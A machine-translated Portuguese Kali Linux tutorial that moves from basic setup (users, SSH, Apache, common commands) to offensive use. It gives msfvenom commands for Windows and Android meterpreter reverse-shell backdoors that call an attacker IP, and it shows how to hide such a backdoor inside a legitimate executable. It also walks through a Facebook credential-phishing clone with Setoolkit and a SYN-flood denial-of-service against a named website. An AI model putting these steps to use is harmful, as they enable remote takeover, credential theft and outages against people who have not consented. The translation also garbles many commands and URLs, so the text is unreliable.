Por que você deve usar o Kali Linux?
Kali Linux é usado principalmente por testadores de penetração, auditores de segurança, investigadores forenses e pesquisadores. Tem quase todas as ferramentas ou script pré-instalado que podem ser usados para qualquer um dos propósitos acima. Você pode usar o Kali Linux para quebrar redes Wi -Fi, para executar o Open Source Intelligence (OSINT) em alguém, para hackear sites e redes e muito mais.
Além de hackers éticos, o Kali Linux também possui um conjunto de ferramentas para investigação forense. Forense é outro ramo importante e emergente da segurança cujo principal objetivo é coletar e analisar evidências de uma atividade criminosa e depois voltar a backtrack criminosos cibernéticos. A investigação forense ajuda a rastrear e remover efeitos maliciosos (backdoors, malwares) resultou de uma atividade criminosa e calculando/lidando com a perda após um ataque cibernético. O Kali Linux tem um modo de vida furtivo separado para operações "forenses" nas quais não deixa nenhuma impressão digital no sistema do host.
Ficar confortável com o ambiente de Kali
Kali não é feito para usuários comuns e não é muito fácil de usar, como Windows ou Ubuntu. Seu ambiente padrão é raiz, o que não é muito fácil de usar e é bastante perigoso para Noobs. Também não possui alguns utilitários básicos, como Snap, VirtualBox e outros utilitários úteis que estão presentes no Ubuntu.
As coisas importantes primeiro
A primeira coisa a fazer é fazer um usuário sem raios
raiz@kali: ~# adduser kali
Adicionando o usuário 'kali'…
Adicionando novo grupo 'Kali' (1002)…
Adicionando novo usuário 'Kali' (1002) com grupo 'kali'…
Criando diretório doméstico '/home/kali'…
Copiando arquivos de '/etc/skel'…
Nova Senha:
… Snip…
root@kali: ~# userMod -AG sudo kali
Inicialize o banco de dados PostgreSQL da Metasploit Framework
root@kali: ~# msfdb init
Criando o usuário do banco de dados 'msf'
Digite a senha para nova função:
Entre novamente:
Criando bancos de dados 'msf' e 'msf_test'
… Snip…
Adicione as seguintes linhas às suas fontes “/etc/apt/.List ”arquivo
Deb http: // http.Kali.Org/Kali Kali-Rolling principal contribuinte
# Para acesso ao pacote de origem, descomamento a seguinte linha
# Deb-Src http: // http.Kali.Org/Kali Kali-Rolling principal contribuinte
Instale outras ferramentas úteis.
root@kali: ~# Apt -get Update && apt upgrade -y
root@kali: ~# apt-get install virtualbox virtualBox-dkms gobuster Tor Tor-Browser
OpenVPN HTOP Atom Deepin -terminal Tilix -y
Gerenciando os serviços padrão de Kali
Kali vem com muitos serviços não-padrão pré-instalados, como PostgreSQL, MySQL, SSH, HTTP. Se não estiver configurado corretamente, esses serviços começarão como um processo em segundo plano quando o seu Kali Linux inicializar e essas portas abertas podem ser uma ameaça à segurança do seu sistema.
Nesta seção, veremos como esses serviços funcionam e como você pode configurá -los corretamente e como você pode usá -los. A maneira padrão de configurar uma ferramenta ou um serviço é lida seu arquivo de leitura doc. O arquivo readme contém o procedimento padrão para configurar e usar uma ferramenta ou um serviço. Os arquivos ReadMe geralmente estão localizados em pasta “Usr/Share/Doc/[Tool_name]/ReadMe”.
Serviço de shell seguro (SSH)
O Secure Shell (SSH) tem sido usado há muito tempo como uma ferramenta padrão para executar comandos, transferir arquivos e outros fins de administração remota remotamente. O pacote inclui ssh (cliente) e sshd (serviço) para controlar outras máquinas remotamente.
O serviço SSH não é iniciado por padrão quando Kali Boots Up, você pode iniciá -lo digitando,
root@kali: ~ $ service ssh start
root@kali: ~ $ netstat -Antp | grep -i sshd
TCP 0 0 0.0.0.0:22 0.0.0.0:* Ouça 6601/sshd
tcp6 0 0 ::: 22 :::* Ouça 6601/sshd
Se você deseja que o SSHD comece toda vez que seu kali inicializa. Tipo
root@kali: ~ $ update-rc.D SSH Ativar
Se você quiser que alguém faça login no seu PC via SSH, ele usará o nome de usuário e a senha do seu kali para autenticação de login. Então, melhor altere sua senha padrão "Toor" para algo seguro.
root@kali: ~ $ passwd
Alterando a senha para root.
Senha atual:
Nova Senha:
Vestem nova senha:
Passwd: senha atualizada com sucesso
Agora, recarregue o serviço SSH para afetar as mudanças
root@kali: ~ $ service ssh recarregar
Serviço HTTP
O serviço HTTP é muito benéfico ao executar tarefas relacionadas a hackers éticos. Ele pode ser usado para hospedar páginas e sites de phishing falsos, para transferir arquivos para servidores de vítimas remotas. Com os aplicativos da Web se tornando mais populares todos os dias, agora é mais importante ter conhecimento para entender e operar servidores HTTP como o Apache.
Apache é um servidor HTTP que vem pré-instalado em Kali. O serviço HTTP do Apache está desativado por padrão, mas você pode iniciá -lo usando o seguinte comando.
root@kali: ~ $ service Apache2 Iniciar
O Apache sediará sua página do Debian Padrão em seu domínio local na porta HTTP padrão 80. Vá para http: // localhost: 80/
Para iniciá -lo toda vez que seu kali começa, digite
root@kali: ~ $ update-rc.D Apache2 Ativar
Você também pode configurar o Apache em porta não padrão modificando seu arquivo de configuração (/etc/apache2/portas.conf)
root@kali: ~ $ nano/etc/apache2/portas.conf
Salve o arquivo e depois corra
root@kali: ~ $ service apache 2 reiniciar
Agora, o Apache Will Server na porta “1234” em vez da porta padrão 80.
Se você quiser ler a documentação completa do Apache Server, vá para o diretório "/usr/share/doc/apache2/", digite
root@kali: ~ $ cd/usr/share/doc/apache2/
root@kali:/usr/share/doc/apache2 $ gzip -decompressor readme.Debian.gz
root@kali:/usr/share/doc/apache2 $ nano readme.Debian
Uma lista de alguns comandos úteis
localizar é usado para localizar um arquivo no Linux, antes de usar este comando, você deve atualizar seu banco de dados primeiro
root@kali: ~# atualizadob
root@kali: ~# localize uqjhssvf.JPEG
/root/uqjhssvf.JPEG
encontrar é mais agressivo e não depende do banco de dados. Ele pesquise recursivamente o arquivo em determinado diretório e seus subdiretos.
root@kali: ~# encontre ./ -Name Main.py
./Desktop/Main.py
wget pode ser usado para baixar uma página ou arquivo na web no terminal.
root@kali: ~# wget tinytuba.com
--2019-05-11 08: 58: 48-- http: // tinytuba.coma
Resolvendo Tinytuba.com (Tinytuba.com)… 52.216.129.66
Conectando -se a Tinytuba.com (Tinytuba.com) | 52.216.129.66 |: 80… conectado.
Solicitação HTTP enviada, aguardando resposta… 200 ok
Comprimento: 1551 (1.5K) [Texto/html]
Economizando para: 'Índice.html '
índice.html 100%[==========================>] 1.51k --.-Kb/s em 0s
2019-05-11 08:58:50 (56.5 mb/s) - 'Índice.HTML 'salvo [1551/1551]
raiz@kali: ~# Firefox Index.html
principal fornece informações sobre sua CPU, uso de memória e outras estatísticas.
história Mostre a lista de comandos anteriores que você inseriu em seu terminal.
Alguns outros comandos úteis que você pode encontrar na internet são LS, RM, RMDIR, Adduser, Deluser, Serviço, Nano, Cat, Mais, Leme, Uname, Whoami etc
Gerando backdoors maliciosos
Você pode gerar binários de exe maliciosos usando "msfvenom" kali linux e instalá -los no sistema de outra pessoa para controlá -lo remotamente.
root@kali: ~ $ msfvenom -a x86 --platform windows -b '\ x00' -p windows/meterpreter/reverse_tcp
LHOST = [endereço IP do atacante] lport = [porta do atacante no] -f exe> diversão.exe
Encontrado 11 codificadores compatíveis
Tentando codificar a carga útil com 1 iterações de x86/shikata_ga_nai
x86/shikata_ga_nai conseguiu com o tamanho 368 (iteração = 0)
x86/shikata_ga_nai escolhido com tamanho final 368
Tamanho da carga útil: 368 bytes
Tamanho final do arquivo exe: 73802 bytes
root@kali: ~ $ ls diversão.exe
diversão.exe
root@kali: ~ $ File Fun.exe
diversão.EXE: PE32 Executável (GUI) Intel 80386, para MS Windows
Para gerar backdoor para os sistemas Windows de arquitetura X64, digite o seguinte comando.
root@kali: ~ $ msfvenom --platform windows -b '\ x00' -p windows/x64/meterpreter/reverse_tcp
LHOST = [endereço IP do atacante] lport = [porta do atacante no] -f exe> diversão.exe
[-] nenhum arco selecionado, selecionando arco: x64 da carga útil
Encontrado 3 codificadores compatíveis
… Snip…
root@kali: ~ $ File Fun.exe
diversão.EXE: PE32+ executável (GUI) x86-64, para MS Windows
Incorporar backdoors em aplicações legítimas usando Kali
Você também pode incorporar seu código de backdoor malicioso em um arquivo exe inofensivo, como o Adobe Reader Installer ou algum media player executável. O executável resultante parecerá um aplicativo de software legítimo, mas quando executado no computador da vítima, ele executará seu backdoor malicioso ao lado dessa aplicação legítima, resultando em comprometimento do PC da vítima.
Já existem alguns Windows executáveis presentes no Kali Linux, que usaremos para demonstração.
root@kali: ~ $ ls/usr/share/windows binários/
backdoors/ exe2bat.exe fport/ klogger.exe nbtenum/ plink.EXE VNCViewer.exe whoami.exe
enumplus/ fgdump/ hyperion/ mbenum/ nc.exe radmin.exe wget.exe
Injetaremos nossa carga útil em “VNCViewer.exe ”executável.
root@kali: ~ $ msfvenom -a x86 --platform windows -x/usr/share/windows binários/vncviewer.exe
-K -P Windows/MeterPreter/Reverse_tcp lhost = [IP do atacante] lport = [porta do atacante]
-e x86/shikata_ga_nai -i 3 -b "\ x00" -f exe -o vncviewer.exe
Encontrado 1 codificadores compatíveis
Tentando codificar a carga útil com 3 iterações de x86/shikata_ga_nai
… Snip…
Tamanho da carga útil: 422 bytes
Tamanho final do arquivo exe: 421376 bytes
Salvo como: vncviewer.exe
Gerando backdoors do Android
Para controlar remotamente os telefones Android, você pode gerar arquivos APK maliciosos usando MSFVENOM.
root@kali: ~ $ msfvenom -p Android/meterpreter/reverse_tcp lhost = [IP do atacante]
Lport = [porta do atacante no] r> qualquer coisa.APK
[-] Nenhuma plataforma foi selecionada, escolhendo MSF :: Module :: Platform :: Android da carga útil
[-] nenhum arco selecionado, selecionando arco: dalvik da carga útil
Nenhum codificador ou badchars especificado, emitindo carga útil bruta
Tamanho da carga útil: 10087 bytes
Engenharia Social usando Setoolkit
Engenharia Social é o uso do engano para enganar alguém a revelar suas informações confidenciais ou pessoais que podem ser mal utilizadas para fins maliciosos.
A técnica de engenharia social mais usada é phishing, na qual você tenta enviar mensagens, e -mails ou telefonemas para obter informações pessoais, especialmente informações relacionadas ao dinheiro. Em ataque de phishing, o recebedor de um e -mail é persuadido de que ele recebeu o e -mail de uma fonte genuína como um banco ou um departamento do governo e depois enganou para revelar suas credenciais sensíveis.
Nesta demonstração, clonaremos uma página de login do Facebook usando o Setoolkit e hospedaremos essa página em nosso servidor HTTP, então enviaremos o endereço IP do servidor HTTP para a vítima. Quando a vítima faz login na nossa página de login do Facebook falsa, esta página enviará seu nome de usuário e senha para nossa máquina Kali.
Tipo Setoolkit No terminal, o setOolkit será aberto
Quando a vítima insere nosso endereço IP em seu navegador, ele será apresentado à nossa falsa página de login do Facebook que criamos anteriormente. Temos que esperar até que a vítima entre seu nome de usuário e senha em nossa página clonada. A página falsa no Facebook vai ficar assim,
Enquanto o usuário inserir suas credenciais, o Setoolkit as exibirá no terminal.
Esta demonstração estava na rede local, se você quiser fazer isso em IP público, você precisa fazer o encaminhamento de porta no seu roteador ou pode usar o ngrok para IP público e número da porta.
Negação de negação de serviço (DOS) usando metasploit
O ataque de negação de serviço (DOS) é um tipo de ataque a um sistema ou rede que diminui ou restringe a acessibilidade dos recursos do sistema a seus usuários legítimos. O objetivo de um ataque do DOS não é roubar informações confidenciais, em vez de invasor tenta o sistema de vítimas de inundação com solicitações de serviço não legitimadas para sobrecarregar seus recursos.
Um ataque distribuído de negação de serviço (DDoS) precisa de um grande número de sistemas (referidos como zumbis) atacando um único alvo, resultando em negação de serviço. Um único ataque de DOS não pode afetar grandes servidores e redes corporativos, é por isso que o DDoS é mais eficaz e letal. Também é difícil rastrear e bloquear o ataque de DDoS porque centenas e milhares de sistemas de zumbis atacam um único host.
São muitas ferramentas e scripts disponíveis para ataques DOS e DDoS, mas usaremos um módulo auxiliar de metasploit para demonstração. Vamos tentar derrubar um site de amostra “www.Jarusa.com ”.
Primeiro, vá para https: // www.IsitdownRightnow.com/ e confirme que o site está em funcionamento
O site está acordado. Agora, o Open Metasploit Framework Console em seu terminal.
root@kali: ~ $ msfconsole
… Snip…
msf5> use auxiliar/dos/tcp/synflood
Descobrir www.Jarusa.como endereço IP e defina -o como RHOST e depois execute o ataque
Depois de um tempo, você verá que o site não está disponível. Confirme usando https: // www.IsitdownRightnow.coma
Kali Linux é um lar para hackers éticos e este tutorial esperançosamente o esclareceu no básico do Kali Linux, o que pode fazer e como começar com seu uso.